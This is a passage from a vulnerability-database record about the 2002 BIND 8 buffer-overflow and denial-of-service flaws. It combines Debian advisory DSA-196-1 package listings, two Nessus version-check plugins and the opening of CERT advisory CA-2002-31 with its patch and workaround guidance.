----------------------\n\n Oldstable was released for alpha, arm, i386, m68k, powerpc and sparc.\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3-0.potato.3.dsc\n Size/MD5 checksum: 630 98f61786fa959c589c0a651868a622f9\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3-0.potato.3.diff.gz\n Size/MD5 checksum: 162301 be163758728858c77dbee6ae67f9a5d5\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3.orig.tar.gz\n Size/MD5 checksum: 2610779 46b88bbdb1487951ddad41f42d96e913\n\n Architecture independent packages:\n\n http://security.debian.org/pool/updates/main/b/bind/task-dns-server_8.2.3-0.potato.3_all.deb\n Size/MD5 checksum: 11784 e75edf3668a5e402a1786ead21dfa2c2\n http://security.debian.org/pool/updates/main/b/bind/bind-doc_8.2.3-0.potato.3_all.deb\n Size/MD5 checksum: 1205360 c238cea2c548ce03599948fa94aa2e7d\n\n alpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.2.3-0.potato.3_alpha.deb\n Size/MD5 checksum: 430518 538b677dcb4df6c0ef601663ff9cf3e7\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3-0.potato.3_alpha.deb\n Size/MD5 checksum: 757704 9f075c3e03d36c393fbeeaf2f5a7b10a\n http://security.debian.org/pool/updates/main/b/bind/dnsutils_8.2.3-0.potato.3_alpha.deb\n Size/MD5 checksum: 450254 c811eda1f1a8212d17d9beeafc892858\n\n arm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.2.3-0.potato.3_arm.deb\n Size/MD5 checksum: 348888 b53e413cdd06f1fa422e27e7f318deb9\n http://security.debian.org/pool/updates/main/b/bind/dnsutils_8.2.3-0.potato.3_arm.deb\n Size/MD5 checksum: 354084 63004fdf3b7babf014e4b55d18f21be0\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3-0.potato.3_arm.deb\n Size/MD5 checksum: 600964 e14cf9feb989058dfce82e42b112c09a\n\n i386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/b/bind/dnsutils_8.2.3-0.potato.3_i386.deb\n Size/MD5 checksum: 340444 31b08eaeb38c0df2ed1cb6cb6fa3f5de\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3-0.potato.3_i386.deb\n Size/MD5 checksum: 572016 540d025d851c207596f02f293d32dbca\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.2.3-0.potato.3_i386.deb\n Size/MD5 checksum: 309622 476724d25b348bdfa3f314bf8777e05a\n\n m68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.2.3-0.potato.3_m68k.deb\n Size/MD5 checksum: 292776 8a6434791431dfb571516650b84d68e1\n http://security.debian.org/pool/updates/main/b/bind/dnsutils_8.2.3-0.potato.3_m68k.deb\n Size/MD5 checksum: 310122 696bb7556163e30bfd39d3798c2ba094\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3-0.potato.3_m68k.deb\n Size/MD5 checksum: 520006 ff5bb2578be770dcaa209fc9f28e66ae\n\n powerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3-0.potato.3_powerpc.deb\n Size/MD5 checksum: 617500 15b7bc50fa768046c504a03ddafec602\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.2.3-0.potato.3_powerpc.deb\n Size/MD5 checksum: 376410 0305a064cb99e0c8a6946c8f33fcdc0c\n http://security.debian.org/pool/updates/main/b/bind/dnsutils_8.2.3-0.potato.3_powerpc.deb\n Size/MD5 checksum: 371218 7dea62489269317b588df637e5b40298\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.2.3-0.potato.3_sparc.deb\n Size/MD5 checksum: 607994 05807466ad228e965b60daeaeb8b3738\n http://security.debian.org/pool/updates/main/b/bind/dnsutils_8.2.3-0.potato.3_sparc.deb\n Size/MD5 checksum: 368582 6dec11c8f07deb83622632e99875d601\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.2.3-0.potato.3_sparc.deb\n Size/MD5 checksum: 335440 51a7f16483360f834f19577def32198f\n\nDebian 3.0 (stable)\n- -------------------\n\n Stable was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1.dsc\n Size/MD5 checksum: 639 0a65835e20faaba4f351b34330b7aa2c\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1.diff.gz\n Size/MD5 checksum: 31430 d7ff2bae2f2233c0a6588fbea3dd9964\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3.orig.tar.gz\n Size/MD5 checksum: 2713120 847ba93d1ac71b94560c002c9f730100\n\n Architecture independent packages:\n\n http://security.debian.org/pool/updates/main/b/bind/bind-doc_8.3.3-2.0woody1_all.deb\n Size/MD5 checksum: 1290726 0634671f5432f7a8c348e9624e64d349\n\n alpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_alpha.deb\n Size/MD5 checksum: 999188 f2b729eb9f85b55d8a71db3e44db825a\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_alpha.deb\n Size/MD5 checksum: 509272 402cd93961d836a8e4cf491655ae0a29\n\n arm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_arm.deb\n Size/MD5 checksum: 826484 2a2abd103a460071f380ac501de6ee63\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_arm.deb\n Size/MD5 checksum: 426982 657a181d3781da2db5e434c1199c7628\n\n hppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_hppa.deb\n Size/MD5 checksum: 921372 6193f53e7d6f676ab306ffb81b4df10d\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_hppa.deb\n Size/MD5 checksum: 475096 a948f910047cbad89d1c7ff26faacfae\n\n i386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_i386.deb\n Size/MD5 checksum: 381878 12c0435300e4a879037895d3bb7f2ddc\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_i386.deb\n Size/MD5 checksum: 793562 27e5c151a7acda692fc332f4db9ce218\n\n ia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_ia64.deb\n Size/MD5 checksum: 1285738 5a72e98954d09e5cf3c5caaaf05f5f34\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_ia64.deb\n Size/MD5 checksum: 575798 bfc630343fc7a88f5ce005e387ee9639\n\n m68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_m68k.deb\n Size/MD5 checksum: 362654 c6712c1d7f17daab556dbfe4a1823b99\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_m68k.deb\n Size/MD5 checksum: 720556 67e91d9890a14be213407ecc8c993bab\n\n mips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_mips.deb\n Size/MD5 checksum: 926866 c76bc7407b6c67b507ab5cd33a4618e1\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_mips.deb\n Size/MD5 checksum: 469762 75e3f4d14f742fa2fb44e0d4c9b7623d\n\n mipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_mipsel.deb\n Size/MD5 checksum: 934246 c00972ae586cfd8a4475a932a35ca04a\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_mipsel.deb\n Size/MD5 checksum: 470648 6271291263bfbfb4e14733d02c560fa0\n\n powerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_powerpc.deb\n Size/MD5 checksum: 451604 b9459ac7c9554f0276bef06762257785\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_powerpc.deb\n Size/MD5 checksum: 851852 85e204bc94b1a0bb2fd02c0d4717400a\n\n s390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_s390.deb\n Size/MD5 checksum: 797738 101ec9c552bcf99618a08abb07209406\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_s390.deb\n Size/MD5 checksum: 387006 3ba683f9d05c411897432aee90566024\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/b/bind/bind-dev_8.3.3-2.0woody1_sparc.deb\n Size/MD5 checksum: 408732 e4463b87c64a6d08863c470e757a6dd2\n http://security.debian.org/pool/updates/main/b/bind/bind_8.3.3-2.0woody1_sparc.deb\n Size/MD5 checksum: 839566 b42c13cdc206437eb3a5353d86e34201\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 2, "modified": "2002-11-14T00:00:00", "published": "2002-11-14T00:00:00", "id": "DEBIAN:DSA-196-1:62A00", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00120.html", "title": "[SECURITY] [DSA-196-1] New BIND packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-03-01T01:25:26", "description": "The remote name server, according to its version number, is affected\nby the following vulnerabilities :\n\n- When running the recursive DNS functionality, this server is\nvulnerable to a buffer overflow attack that may let an attacker\nexecute arbitrary code on the remote host. \n\n- It is vulnerable to a denial of service attack (crash) via SIG RR\nelements with invalid expiry times. \n\n- It is vulnerable to a denial of service attack when a DNS lookup is\nrequested on a nonexistent sub-domain of a valid domain and an OPT\nresource record with a large UDP payload is attached, the server may\nfail.", "edition": 26, "published": "2002-03-08T00:00:00", "title": "ISC BIND < 8.3.4 Multiple Remote Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:isc:bind"], "id": "BIND_DNSSTORM.NASL", "href": "https://www.tenable.com/plugins/nessus/10886", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security \n# Ian Koenig <ian@carmichaelsecurity.com> (nb: this domain no longer exists)\n# Added BugtraqID and CVE\n# Updated to handle two specific types of attacks instead of just a general\n# statement of \"vulnerable to DNS storm attacks\".\n# \n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10886);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\");\n script_bugtraq_id(6159, 6160, 6161);\n script_xref(name:\"SuSE\", value:\"SUSE-SA:2002:044\");\n \n script_name(english:\"ISC BIND < 8.3.4 Multiple Remote Vulnerabilities\");\n script_summary(english:\"Checks the remote BIND version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to use the remote name server to break into the\nremote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote name server, according to its version number, is affected\nby the following vulnerabilities :\n\n- When running the recursive DNS functionality, this server is\nvulnerable to a buffer overflow attack that may let an attacker\nexecute arbitrary code on the remote host. \n\n- It is vulnerable to a denial of service attack (crash) via SIG RR\nelements with invalid expiry times. \n\n- It is vulnerable to a denial of service attack when a DNS lookup is\nrequested on a nonexistent sub-domain of a valid domain and an OPT\nresource record with a large UDP payload is attached, the server may\nfail.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to BIND 8.3.4 or newer\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/03/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/11/12\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:isc:bind\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english: \"DNS\");\n\n script_dependencie(\"bind_version.nasl\");\n script_require_keys(\"bind/version\");\n exit(0);\n}\n\nvers = get_kb_item(\"bind/version\");\nif(!vers)exit(0);\n\nif(ereg(string:vers,\n\t pattern:\"^8\\.(([0-1].*)|(2\\.[0-6])|(3\\.0\\.[0-3])).*\"))security_hole(53);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:49", "description": "[Bind version 9, the bind9 package, is not affected by these\nproblems.]\n\nISS X-Force has discovered several serious vulnerabilities in the\nBerkeley Internet Name Domain Server (BIND). BIND is the most common\nimplementation of the DNS (Domain Name Service) protocol, which is\nused on the vast majority of DNS servers on the Internet. DNS is a\nvital Internet protocol that maintains a database of easy-to-remember\ndomain names (host names) and their corresponding numerical IP\naddresses.\n\nCircumstantial evidence suggests that the Internet Software Consortium\n(ISC), maintainers of BIND, was made aware of these issues in\nmid-October. Distributors of Open Source operating systems, including\nDebian, were notified of these vulnerabilities via CERT about 12 hours\nbefore the release of the advisories on November 12th. This\nnotification did not include any details that allowed us to identify\nthe vulnerable code, much less prepare timely fixes.\n\nUnfortunately ISS and the ISC released their security advisories with\nonly descriptions of the vulnerabilities, without any patches. Even\nthough there were no signs that these exploits are known to the\nblack-hat community, and there were no reports of active attacks, such\nattacks could have been developed in the meantime - with no fixes\navailable.\n\nWe can all express our regret at the inability of the ironically named\nInternet Software Consortium to work with the Internet community in\nhandling this problem. Hopefully this will not become a model for\ndealing with security issues in the future.\n\nThe Common Vulnerabilities and Exposures (CVE) project identified the\nfollowing vulnerabilities :\n\n - CAN-2002-1219: A buffer overflow in BIND 8 versions\n 8.3.3 and earlier allows a remote attacker to execute\n arbitrary code via a certain DNS server response\n containing SIG resource records (RR). This buffer\n overflow can be exploited to obtain access to the victim\n host under the account the named process is running\n with, usually root.\n - CAN-2002-1220: BIND 8 versions 8.3.x through 8.3.3\n allows a remote attacker to cause a denial of service\n (termination due to assertion failure) via a request for\n a subdomain that does not exist, with an OPT resource\n record with a large UDP payload size.\n\n - CAN-2002-1221: BIND 8 versions 8.x through 8.3.3 allows\n a remote attacker to cause a denial of service (crash)\n via SIG RR elements with invalid expiry times, which are\n removed from the internal BIND database and later cause\n a null dereference.\n\nThese problems have been fixed in version 8.3.3-2.0woody1 for the\ncurrent stable distribution (woody), in version 8.2.3-0.potato.3 for\nthe previous stable distribution (potato) and in version 8.3.3-3 for\nthe unstable distribution (sid). The fixed packages for unstable will\nenter the archive today.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-196-1 : bind - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0029", "CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:bind"], "id": "DEBIAN_DSA-196.NASL", "href": "https://www.tenable.com/plugins/nessus/15033", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-196. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15033);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0029\", \"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\");\n script_bugtraq_id(6159, 6160, 6161);\n script_xref(name:\"CERT\", value:\"229595\");\n script_xref(name:\"CERT\", value:\"542971\");\n script_xref(name:\"CERT\", value:\"581682\");\n script_xref(name:\"CERT\", value:\"844360\");\n script_xref(name:\"CERT\", value:\"852283\");\n script_xref(name:\"DSA\", value:\"196\");\n\n script_name(english:\"Debian DSA-196-1 : bind - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"[Bind version 9, the bind9 package, is not affected by these\nproblems.]\n\nISS X-Force has discovered several serious vulnerabilities in the\nBerkeley Internet Name Domain Server (BIND). BIND is the most common\nimplementation of the DNS (Domain Name Service) protocol, which is\nused on the vast majority of DNS servers on the Internet. DNS is a\nvital Internet protocol that maintains a database of easy-to-remember\ndomain names (host names) and their corresponding numerical IP\naddresses.\n\nCircumstantial evidence suggests that the Internet Software Consortium\n(ISC), maintainers of BIND, was made aware of these issues in\nmid-October. Distributors of Open Source operating systems, including\nDebian, were notified of these vulnerabilities via CERT about 12 hours\nbefore the release of the advisories on November 12th. This\nnotification did not include any details that allowed us to identify\nthe vulnerable code, much less prepare timely fixes.\n\nUnfortunately ISS and the ISC released their security advisories with\nonly descriptions of the vulnerabilities, without any patches. Even\nthough there were no signs that these exploits are known to the\nblack-hat community, and there were no reports of active attacks, such\nattacks could have been developed in the meantime - with no fixes\navailable.\n\nWe can all express our regret at the inability of the ironically named\nInternet Software Consortium to work with the Internet community in\nhandling this problem. Hopefully this will not become a model for\ndealing with security issues in the future.\n\nThe Common Vulnerabilities and Exposures (CVE) project identified the\nfollowing vulnerabilities :\n\n - CAN-2002-1219: A buffer overflow in BIND 8 versions\n 8.3.3 and earlier allows a remote attacker to execute\n arbitrary code via a certain DNS server response\n containing SIG resource records (RR). This buffer\n overflow can be exploited to obtain access to the victim\n host under the account the named process is running\n with, usually root.\n - CAN-2002-1220: BIND 8 versions 8.3.x through 8.3.3\n allows a remote attacker to cause a denial of service\n (termination due to assertion failure) via a request for\n a subdomain that does not exist, with an OPT resource\n record with a large UDP payload size.\n\n - CAN-2002-1221: BIND 8 versions 8.x through 8.3.3 allows\n a remote attacker to cause a denial of service (crash)\n via SIG RR elements with invalid expiry times, which are\n removed from the internal BIND database and later cause\n a null dereference.\n\nThese problems have been fixed in version 8.3.3-2.0woody1 for the\ncurrent stable distribution (woody), in version 8.2.3-0.potato.3 for\nthe previous stable distribution (potato) and in version 8.3.3-3 for\nthe unstable distribution (sid). The fixed packages for unstable will\nenter the archive today.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-196\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bind package immediately, update to bind9, or switch to\nanother DNS server implementation.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"bind\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"bind-dev\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"bind-doc\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"dnsutils\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"task-dns-server\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"bind\", reference:\"8.3.3-2.0woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"bind-dev\", reference:\"8.3.3-2.0woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"bind-doc\", reference:\"8.3.3-2.0woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-0029", "CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\nCERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND\r\n\r\n Original release date: November 14, 2002\r\n Last revised: --\r\n Source: CERT/CC\r\n\r\n A complete revision history can be found at the end of this file.\r\n\r\nSystems Affected\r\n\r\n * Systems running various versions of BIND 4 and BIND 8\r\n\r\n Because the normal operation of most services on the Internet\r\n depends on the proper operation of DNS servers, other services\r\n could be affected if these vulnerabilities are exploited.\r\n\r\nOverview\r\n\r\n Multiple vulnerabilities with varying impacts have been found in BIND,\r\n the popular domain name server and client library software package\r\n from the Internet Software Consortium &#40;ISC&#41;.\r\n\r\n Some of these vulnerabilities may allow remote attackers to execute\r\n arbitrary code with the privileges of the user running named,\r\n &#40;typically root&#41;, or with the privileges of vulnerable client\r\n applications. The other vulnerabilities will allow remote attackers to\r\n disrupt the normal operation of DNS name service running on victim\r\n servers.\r\n\r\nI. Description\r\n\r\n Multiple vulnerabilities have been found in BIND &#40;Berkeley Internet\r\n Name Domain&#41;. Some of these vulnerabilities &#40;VU#852283, VU#844360&#41; may\r\n allow remote attackers to execute arbitrary code with the privileges\r\n of the user running named, typically root. The other vulnerabilities\r\n &#40;VU#229595, VU#581682&#41; will allow remote attackers to disrupt the\r\n normal operation of your name server, possibly causing a crash.\r\n\r\nBIND DNS Server Vulnerabilities\r\n\r\nVU#852283 - Cached malformed SIG record buffer overflow\r\n\r\n This vulnerability is a buffer overflow in named. It can occur when\r\n responses are constructed using previously-cached malformed SIG\r\n records. &#40;SIG records are typically associated with cryptographically\r\n signed DNS data.&#41; Exploitation of the vulnerability can lead to\r\n arbitrary code execution as the named uid, typically root.\r\n\r\n The following versions of BIND are affected:\r\n\r\n - BIND versions 4.9.5 to 4.9.10\r\n - BIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3\r\n\r\nVU#229595 - Overly large OPT record assertion\r\n\r\n ISC BIND 8 fails to properly handle DNS lookups for non-existent\r\n sub-domains when overly large OPT resource records are appended to a\r\n query. When a non-existent domain &#40;NXDOMAIN&#41; response is constructed\r\n by a victim nameserver, an assertion may be triggered if the client\r\n passes a large UDP buffer size. This assertion will cause the running\r\n named to exit.\r\n\r\n The following versions of BIND are affected:\r\n \r\n - BIND versions 8.3.0 to 8.3.3\r\n\r\nVU#581682 - ISC BIND 8 fails to properly de-reference cache SIG RR elements\r\nwith invalid expiry times from the internal database\r\n\r\n ISC&#39;s description of this vulnerability states:\r\n\r\n It is possible to de-reference a NULL pointer for certain signature\r\n expire values. \r\n\r\n The following versions of BIND are affected:\r\n\r\n - BIND versions 8.2 to 8.2.6\r\n - BIND versions 8.3.0 to 8.3.3.\r\n\r\nBIND DNS Resolver Vulnerabilities\r\n\r\nVU#844360 - Domain Name System &#40;DNS&#41; stub resolver libraries vulnerable to\r\nbuffer overflows via network name or address lookups\r\n\r\n An attacker could execute arbitrary code with the privileges of the\r\n application that made the request or cause a denial of service. The\r\n attacker would need to control the contents of DNS responses, possibly\r\n by spoofing responses or gaining control of a DNS server.\r\n\r\n These vulnerabilities are distinct from the issues discussed in\r\n CA-2002-19. The following DNS stub resolver libraries are known to be\r\n affected:\r\n\r\n - BIND 4.9.2 through 4.9.10\r\n\r\n The status of other resolver libraries derived from BIND 4 such as BSD\r\n libc, GNU glibc, and those used by System V UNIX systems is currently\r\n unknown. Additionally, these issues are mapped to CVE as follows.\r\n\r\n VU#852283 - CAN-2002-1219\r\n VU#229595 - CAN-2002-1220\r\n VU#581682 - CAN-2002-1221\r\n VU#844360 - CAN-2002-0029\r\n\r\nII. Impact\r\n\r\nVU#852283 - Cached malformed SIG record buffer overflow\r\n\r\n A remote attacker could execute arbitrary code on the nameserver with\r\n the privileges of the named uid, typically root.\r\n\r\nVU#229595 - Overly large OPT record assertion\r\n\r\n A remote attacker can disrupt the normal operation of your name\r\n server, possibly causing a crash.\r\n\r\nVU#581682 - ISC BIND 8 fails to properly de-reference cache SIG RR elements\r\nwith invalid expiry times from the internal database\r\n\r\n A remote attacker can disrupt the normal operation of your name\r\n server, possibly causing a crash.\r\n\r\nVU#844360 - Domain Name System &#40;DNS&#41; stub resolver libraries vulnerable to\r\nbuffer overflows via network name or address lookups\r\n\r\n An attacker could execute arbitrary code with the privileges of the\r\n application that made the request or cause a denial of service. The\r\n attacker would need to control the contents of DNS responses, possibly\r\n by spoofing responses or gaining control of a DNS server.\r\n\r\nIII. Solution\r\n\r\nApply a patch from your vendor.\r\n\r\n Appendix A contains information provided by vendors for this advisory.\r\n As vendors report new information to the CERT/CC, we will update this\r\n section and note the changes in our revision history. If a particular\r\n vendor is not listed below, we have not received their comments.\r\n Please contact your vendor directly.\r\n\r\n If a vendor patch is not available, you may wish to consider applying\r\n the patches ISC has produced:\r\n\r\n BIND 8.3.3 - http://www.isc.org/products/BIND/patches/bind833.diff\r\n\r\n BIND 8.2.6 - http://www.isc.org/products/BIND/patches/bind826.diff\r\n\r\n BIND 4.9.10 - http://www.isc.org/products/BIND/patches/bind4910.diff\r\n\r\n For VU#844360, the BIND 4 libresolv buffer overflows, an upgrade to a\r\n corrected version of the DNS resolver libraries will be required.\r\n\r\n Note that DNS resolver libraries can be used by multiple applications\r\n on most systems. It may be necessary to upgrade or apply multiple\r\n patches and then recompile statically linked applications.\r\n\r\n Applications that are statically linked must be recompiled using\r\n patched resolver libraries. Applications that are dynamically linked\r\n do not need to be recompiled; however, running services need to be\r\n restarted in order to use the patched resolver libraries.\r\n\r\n System administrators should consider the following process when\r\n addressing this issue:\r\n\r\n 1. Patch or obtain updated resolver libraries.\r\n 2. Restart any dynamically linked services that use the resolver\r\n libraries.\r\n 3. Recompile any statically linked applications using the patched or\r\n updated resolver libraries.\r\n\r\n Workarounds\r\n\r\n VU#852283 - Cached malformed SIG record buffer overflow\r\n\r\n VU#229595 - Overly large OPT record assertion\r\n\r\n VU#581682 - ISC BIND 8 fails to properly dereference cache SIG RR\r\n elements with invalid expiry times from the internal database\r\n\r\n One potential workaround to limit exposure to the vulnerabilities in\r\n named is to disable recursion on any nameserver responding to DNS\r\n requests made by untrusted systems. As mentioned in &quot;Securing an\r\n Internet Name Server&quot;:\r\n\r\n Disabling recursion puts your name servers into a passive mode,\r\n telling them never to send queries on behalf of other name servers\r\n or resolvers. A totally non-recursive name server is protected from\r\n cache poisoning, since it will only answer queries directed to it.\r\n It doesn&#39;t send queries, and hence doesn&#39;t cache any data.\r\n Disabling recursion can also prevent attackers from bouncing denial\r\n of services attacks off your name server by querying for external\r\n zones.\r\n\r\n Non-recursive nameservers should be much more resistant to\r\n exploitation of the server vulnerabilites listed above.\r\n\r\n Additional Countermeasures\r\n\r\n ISC recommends upgrading to BIND version 9.2.1. BIND version 9.2.1 is\r\n available from: http://www.isc.org/products/BIND/bind9.html.\r\n\r\n Note that the upgrade from previous versions of BIND may require\r\n additional site reconfiguration.\r\n\r\nAppendix A. - Vendor 